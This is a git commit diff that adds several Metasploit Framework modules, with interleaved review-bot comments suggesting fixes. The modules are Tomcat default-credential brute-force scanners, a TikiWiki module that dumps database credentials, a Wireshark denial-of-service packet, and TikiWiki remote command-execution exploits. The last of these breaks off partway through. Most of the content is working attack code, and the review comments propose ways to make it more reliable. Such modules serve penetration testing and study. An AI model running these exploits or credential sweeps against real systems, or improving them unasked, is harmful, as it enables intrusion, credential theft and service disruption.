Added modules from Matteo Cantoni.
git-svn-id: file:///home/svn/framework3/trunk@6170 4d416f70-5f16-0410-b530-b9f4589650da
parent
32868c4b0f
commit
ff8323e6d2
|
@ -0,0 +1,132 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::WMAPScanServer
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Tomcat Administration Tool default access',
|
||||
'Version' => '$Revision: $',
|
||||
'Description' => 'Detect Tomcat Administration Tool default access.',
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://tomcat.apache.org/'],
|
||||
],
|
||||
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8180),
|
||||
OptString.new('TOMCAT_USER', [ false, 'The username to authenticate as', '']),
|
||||
OptString.new('TOMCAT_PASS', [ false, 'The password for the specified username', '']),
|
||||
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => '/',
|
||||
}, 25)
|
||||
|
||||
if (res and res.code == 200)
|
||||
|
||||
ver = ""
|
||||
|
||||
if res.body.match(/<title>Apache Tomcat\/(.*)<\/title>/)
|
||||
ver = "Apache Tomcat/" + $1
|
||||
end
|
||||
|
||||
user = datastore['TOMCAT_USER'].to_s
|
||||
pass = datastore['TOMCAT_PASS'].to_s
|
||||
|
||||
if user.length == 0
|
||||
default_usernames = ['admin','manager','role1','root','tomcat']
|
||||
else
|
||||
default_usernames = [user]
|
||||
end
|
||||
|
||||
if pass.length == 0
|
||||
default_passwords = ['admin','manager','role1','root','tomcat']
|
||||
else
|
||||
default_passwords = [pass]
|
||||
end
|
||||
|
||||
default_usernames.each do |username|
|
||||
default_passwords.each do |password|
|
||||
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => '/admin/',
|
||||
}, 25)
|
||||
|
||||
if (res and res.code == 200)
|
||||
|
||||
if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/JSESSIONID=(.*);(.*)/i))
|
||||
|
||||
jsessionid = $1
|
||||
|
||||
post_data = "j_username=#{username}&j_password=#{password}"
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => '/admin/j_security_check',
|
||||
'method' => 'POST',
|
||||
'content-type' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => "JSESSIONID=#{jsessionid}",
|
||||
'data' => post_data,
|
||||
}, 25)
|
||||
|
||||
if (res.code == 302)
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/admin/",
|
||||
'method' => 'GET',
|
||||
'cookie' => "JSESSIONID=#{jsessionid}",
|
||||
}, 25)
|
||||
|
||||
if (res.code == 302)
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/admin/frameset.jsp",
|
||||
'method' => 'GET',
|
||||
'cookie' => "JSESSIONID=#{jsessionid}",
|
||||
}, 25)
|
||||
|
||||
if (res.code == 200)
|
||||
print_status("http://#{target_host}:#{rport}/admin [#{res.headers['Server']}] [#{ver}] [Tomcat Server Administration] [#{username}/#{password}]")
|
||||
end
|
||||
|
||||
# LogOut
|
||||
res = send_request_cgi({
|
||||
'uri' => '/admin/logOut.do',
|
||||
'method' => 'GET',
|
||||
'cookie' => "JSESSIONID=#{jsessionid}",
|
||||
}, 25)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
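Review bot: The three send_request_cgi responses tested with `res.code == 302` / `res.code == 302` / `res.code == 200` inside the credential loop are dereferenced without a nil check, unlike the initial GET, so a timed-out or dropped response raises NoMethodError, which neither rescue clause at the bottom of run_host covers, and the remaining username/password pairs for that host are never tried; guard each as `if (res and res.code == 302)`. The form body `post_data = "j_username=#{username}&j_password=#{password}"` is not URL-encoded, so a user-supplied TOMCAT_PASS containing `&`, `%` or `+` is mangled before it reaches j_security_check; build it from `Rex::Text.uri_encode(username)` and `Rex::Text.uri_encode(password)`. The 5x5 default sweep sends up to 25 login attempts per host, which can trip lockout or alerting on a hardened install, so a comment above the default lists stating that, and noting that a non-200 root page silently skips the host, would help operators.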
|
|
@ -0,0 +1,95 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::WMAPScanServer
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Tomcat Application Manager default access',
|
||||
'Version' => '$Revision: $',
|
||||
'Description' => 'Detect Tomcat Web Application Manager default access.',
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://tomcat.apache.org/'],
|
||||
],
|
||||
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8180),
|
||||
OptString.new('TOMCAT_USER', [ false, 'The username to authenticate as', '']),
|
||||
OptString.new('TOMCAT_PASS', [ false, 'The password for the specified username', '']),
|
||||
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => '/',
|
||||
}, 25)
|
||||
|
||||
if (res and res.code == 200)
|
||||
|
||||
user = datastore['TOMCAT_USER'].to_s
|
||||
pass = datastore['TOMCAT_PASS'].to_s
|
||||
|
||||
if user.length == 0
|
||||
default_usernames = ['admin','manager','role1','root','tomcat']
|
||||
else
|
||||
default_usernames = [user]
|
||||
end
|
||||
|
||||
if pass.length == 0
|
||||
default_passwords = ['admin','manager','role1','root','tomcat']
|
||||
else
|
||||
default_passwords = [pass]
|
||||
end
|
||||
|
||||
default_usernames.each do |username|
|
||||
default_passwords.each do |password|
|
||||
|
||||
user_pass = Rex::Text.encode_base64("#{username}" + ":" + "#{password}")
|
||||
|
||||
begin
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/manager/html",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'Authorization' => "Basic #{user_pass}",
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res.code == 200)
|
||||
print_status("http://#{target_host}:#{rport}/manager/html [#{res.headers['Server']}] [Tomcat Application Manager] [#{username}/#{password}]")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
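Review bot: `if (res.code == 200)` in the inner begin block dereferences res without a nil check, so a /manager/html request that times out raises NoMethodError rather than one of the rescued connection errors, and because that exception is not rescued the whole host is abandoned mid-sweep; write it as `if (res and res.code == 200)`. A bare 200 is also a weak success indicator: an instance that answers /manager/html with a custom page or a form login instead of Basic auth is reported once per credential pair, so checking the body for the manager page markup (something like `res.body =~ /Web Application Manager/`) before printing would cut the false positives. The pre-flight GET / only gates the sweep; a one-line comment saying so, and that the credentials found are printed but not recorded, would save the next reader a trace through run_host.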
|
|
@ -0,0 +1,120 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'TikiWiki information disclosure',
|
||||
'Description' => %q{
|
||||
A vulnerability has been reported in Tikiwiki, which can be exploited by
|
||||
a anonymous user to dump the MySQL user & passwd just by creating a mysql
|
||||
error with the "sort_mode" var.
|
||||
The vulnerability has been reported in Tikiwiki version 1.9.5.
|
||||
},
|
||||
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '30172'],
|
||||
['BID', '20858'],
|
||||
['CVE', '2006-5702'],
|
||||
['MIL', '2701'],
|
||||
['URL', 'http://secunia.com/advisories/22678/'],
|
||||
],
|
||||
'DisclosureDate' => 'Nov 1 2006',
|
||||
'Actions' =>
|
||||
[
|
||||
['Download']
|
||||
],
|
||||
'DefaultAction' => 'Download'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Establishing a connection to the target...")
|
||||
|
||||
rpath = datastore['URI'] + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => rpath,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK")
|
||||
print_status("Get informations about database...")
|
||||
|
||||
n = 0
|
||||
c = 0
|
||||
|
||||
infos = res.body.split(/\r|\n/)
|
||||
infos.each do |row|
|
||||
if (c < 6)
|
||||
if (row.match(/\["file"\]=>/))
|
||||
c+=1
|
||||
x = n + 1
|
||||
y = infos[x].match(/string\(\d+\) "(.*)"/m)
|
||||
print_status("Install path : #{y[1]}")
|
||||
end
|
||||
if (row.match(/\["databaseType"\]=>/))
|
||||
c+=1
|
||||
x = n + 1
|
||||
y = infos[x].match(/string\(\d+\) "(.*)"/m)
|
||||
print_status("DB type : #{y[1]}")
|
||||
end
|
||||
if (row.match(/\["database"\]=>/))
|
||||
c+=1
|
||||
x = n + 1
|
||||
y = infos[x].match(/string\(\d+\) "(.*)"/m)
|
||||
print_status("DB name : #{y[1]}")
|
||||
end
|
||||
if (row.match(/\["host"\]=>/))
|
||||
c+=1
|
||||
x = n + 1
|
||||
y = infos[x].match(/string\(\d+\) "(.*)"/m)
|
||||
print_status("DB host : #{y[1]}")
|
||||
end
|
||||
if (row.match(/\["user"\]=>/))
|
||||
c+=1
|
||||
x = n + 1
|
||||
y = infos[x].match(/string\(\d+\) "(.*)"/m)
|
||||
print_status("DB user : #{y[1]}")
|
||||
end
|
||||
if (row.match(/\["password"\]=>/))
|
||||
c+=1
|
||||
x = n + 1
|
||||
y = infos[x].match(/string\(\d+\) "(.*)"/m)
|
||||
print_status("DB password : #{y[1]}")
|
||||
end
|
||||
n+=1
|
||||
end
|
||||
end
|
||||
|
||||
if (c == 0)
|
||||
print_status("Could not obtain informations about database.")
|
||||
end
|
||||
|
||||
else
|
||||
print_status("No response from the server.")
|
||||
end
|
||||
end
|
||||
end
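Review bot: Each `y = infos[x].match(/string\(\d+\) "(.*)"/m)` followed by `#{y[1]}` assumes the line after a matched key exists and carries a `string(N) "..."` value, so a var_dump laid out differently, or a key on the last line of the body, leaves y nil and the module dies with NoMethodError instead of reporting what it did recover; guard with `next unless infos[x]` before the match and print `y ? y[1] : "(unparsed)"`. The six branches differ only in key and label and can be driven from one table, which also makes the `c < 6` cap self-describing; a version is sketched below. The recovered DB credentials are only printed, so a comment stating they are not stored should be added, or they should be reported if the framework's reporting mixin is available.
```ruby
labels = {
  'file'         => 'Install path',
  'databaseType' => 'DB type',
  'database'     => 'DB name',
  'host'         => 'DB host',
  'user'         => 'DB user',
  'password'     => 'DB password',
}
infos = res.body.split(/\r|\n/)
infos.each_with_index do |row, n|
  break if c >= 6
  key = row.match(/\["(\w+)"\]=>/)
  next unless key and labels[key[1]] and infos[n + 1]
  val = infos[n + 1].match(/string\(\d+\) "(.*)"/m)
  c += 1
  print_status("#{labels[key[1]]} : #{val ? val[1] : '(unparsed)'}")
end
# … unchanged: "Could not obtain informations" / "No response" branches …
```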
|
|
@ -0,0 +1,80 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'scruby'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Ip
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireshark chunked_encoding_dissector function DOS',
|
||||
'Description' => %q{
|
||||
Wireshark crash when dissecting an HTTP chunked response.
|
||||
Versions affected: 0.99.5 (Bug 1394)
|
||||
},
|
||||
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'],
|
||||
],
|
||||
'DisclosureDate' => 'February 22 2007'))
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
print_status("Sending packet to #{rhost}")
|
||||
|
||||
connect_ip
|
||||
|
||||
pkt =(
|
||||
Scruby::IP.new(
|
||||
:dst => "#{rhost}",
|
||||
:flags => 4,
|
||||
:len => 20,
|
||||
:ttl => 53,
|
||||
:id => 0x2eac,
|
||||
:chksum => 0xfc13
|
||||
)/Scruby::TCP.new(
|
||||
:sport => 80,
|
||||
:dport => 1296,
|
||||
:seq => 1,
|
||||
:ack => 323,
|
||||
:window => 6432,
|
||||
:chksum => 0xfc13,
|
||||
:flags => 18
|
||||
)/"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x65\x74\x2d\
x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a").to_net
|
||||
|
||||
ip_write(pkt)
|
||||
|
||||
disconnect_ip
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
HTTP/1.1 302 Found
|
||||
Date: Thu, 22 Feb 2007 21:59:03 GMT
|
||||
Server: Apache/1.3.37 (Unix) PHP/4.4.4 mod_throttle/3.1.2 mod_psoft_traffic/0.1 mod_ssl/2.8.28 OpenSSL/0.9.6b FrontPage/5.0.2.2635
|
||||
X-Powered-By: PHP/4.4.4
|
||||
Location: http://127.0.0.1/index.html
|
||||
P3P: policyref="http://127.0.0.1/w3c/p3p.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Pragma: no-cache
|
||||
Content-Disposition: attachment; filename=StatCounter-Log-2287592.csv
|
||||
Set-Cookie: PHPSESSID=d75ed976f009da118eb614b98fd5b916%3B+path%3D%2F
|
||||
Keep-Alive: timeout=15, max=100
|
||||
Connection: Keep-Alive
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
0
|
||||
=end
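Review bot: Both headers carry a fixed `:chksum => 0xfc13` and the IP header a fixed `:len => 20`, values that look copied from the original capture, so unless Scruby recomputes fields that are passed explicitly (not confirmable from here) the packet sent toward a different RHOST has wrong checksums and an IP total length covering only the header, and the capturing Wireshark may dissect it differently from the trace the bug was reproduced with; dropping those three keys so the library fills them in is the safer default, with a comment explaining that `:sport => 80` is pinned because the HTTP dissector keys on it. The long hex literal is byte-for-byte the text shown in the =begin block at the end of the file; building it from a heredoc of that text joined with `\r\n` and ending in the chunk terminator `"0\r\n\r\n"` would make the trigger readable and diffable. The description should also state that the target is the host running Wireshark, not the machine named by RHOST, which only has to sit on a segment that instance captures.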
|
|
@ -0,0 +1,149 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'TikiWiki tiki-graph_formula Remote Command Execution',
|
||||
'Description' => %q{
|
||||
TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary commands.
|
||||
The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input
|
||||
supplied to the f variable, which may allow a remote attacker to execute arbitrary PHP
|
||||
commands resulting in a loss of integrity.
|
||||
},
|
||||
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '40478'],
|
||||
['BID', '26006'],
|
||||
['CVE', '2007-5423'],
|
||||
['MIL', '4525'],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Space' => 1024,
|
||||
},
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'DisclosureDate' => 'Oct 10 2007',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + "/tiki-index.php",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK" and res.body.match(/TikiWiki v1.|TikiWiki 1./))
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
url_db_local = datastore['URI'] +
|
||||
"/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(" +
|
||||
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)." + "chr(59)." +
|
||||
"chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112)." +
|
||||
"chr(59)." + "chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)" +
|
||||
").die()&t=png&title="
|
||||
|
||||
print_status("Sending request...")
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => url_db_local,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK" and res.body)
|
||||
print_status("The server returned : #{res.code} #{res.message}")
|
||||
print_status("Server version : #{res.headers['Server']}")
|
||||
|
||||
db_tiki = res.body.match(/db_tiki='(.*?)';/m)
|
||||
dbversion = res.body.match(/dbversion_tiki='(.*?)';/m)
|
||||
host_tiki = res.body.match(/host_tiki='(.*?)';/m)
|
||||
user_tiki = res.body.match(/user_tiki='(.*?)';/m)
|
||||
pass_tiki = res.body.match(/pass_tiki='(.*?)';/m)
|
||||
dbs_tiki = res.body.match(/dbs_tiki='(.*?)';/m)
|
||||
|
||||
print_status("TikiWiki database informations : \n")
|
||||
|
||||
print("db_tiki : " + db_tiki[1] + "\n")
|
||||
print("dbversion : " + dbversion[1] + "\n")
|
||||
print("host_tiki : " + host_tiki[1] + "\n")
|
||||
print("user_tiki : " + user_tiki[1] + "\n")
|
||||
print("pass_tiki : " + pass_tiki[1] + "\n")
|
||||
print("dbs_tiki : " + dbs_tiki[1] + "\n\n")
|
||||
else
|
||||
print_status("No response from the server")
|
||||
end
|
||||
|
||||
command = Rex::Text.uri_encode(payload.encoded)
|
||||
encoded = payload.encoded.unpack('C*').map { |c| "chr(#{c})"}.join('.') + ".chr(32)"
|
||||
|
||||
url_cmd = datastore['URI'] + "/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(" +
|
||||
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)." + "chr(59)." + encoded + ".chr(59)." +
|
||||
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)" + ").die()&t=png&title="
|
||||
|
||||
print_status("Sending request...")
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => url_cmd,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK" and res.body)
|
||||
|
||||
print_status("The server returned : #{res.code} #{res.message}")
|
||||
cmd_output = res.body.match(/YYY\n(.*)\nYYY/m)
|
||||
|
||||
if (cmd_output)
|
||||
print_status("Command output from the server :")
|
||||
print("\n" + cmd_output[1] + "\n\n")
|
||||
else
|
||||
print_status("This server may not be vulnerable")
|
||||
end
|
||||
|
||||
else
|
||||
print_status("No response from the server")
|
||||
end
|
||||
end
|
||||
|
||||
end
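Review bot: The six `print("db_tiki : " + db_tiki[1] + "\n")`-style lines after the first request index MatchData objects that are nil whenever db/local.php is unreadable or laid out differently, so on such a host the exploit raises NoMethodError before the second request ever delivers the payload; print each as `print("db_tiki : #{db_tiki ? db_tiki[1] : 'n/a'}\n")` or skip the dump when any match fails. `command = Rex::Text.uri_encode(payload.encoded)` is assigned and never used (only the chr()-encoded form is sent) and should be removed. The check method's `/TikiWiki v1.|TikiWiki 1./` reports every 1.x branch as Vulnerable, including releases after 1.9.8 that the description itself excludes, and the unescaped dots widen it further; match the version more tightly or return `Exploit::CheckCode::Appears` if this framework revision provides it. A comment that the `chr(89).chr(89).chr(89)` sentinels exist so the output regex `/YYY\n(.*)\nYYY/m` can isolate command output would also help.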
|
|
@ -0,0 +1,204 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'TikiWiki jhot Remote Command Execution',
|
||||
'Description' => %q{
|
||||
TikiWiki contains a flaw that may allow a malicious user to execute
|
||||
arbitrary PHP code. The issue is triggered due to the jhot.php script
|
||||
not correctly verifying uploaded files. It is possible that the flaw
|
||||
may allow arbitrary PHP code execution by uploading a malicious PHP
|
||||
script resulting in a loss of integrity.
|
||||
The vulnerability has been reported in Tikiwiki version 1.9.4.
|
||||
},
|
||||
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '28456'],
|
||||
['BID', '19819'],
|
||||
['CVE', '2006-4602'],
|
||||
['MIL', '2288'],
|
||||
['URL', 'http://secunia.com/advisories/21733/'],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Space' => 1024,
|
||||
},
|
||||
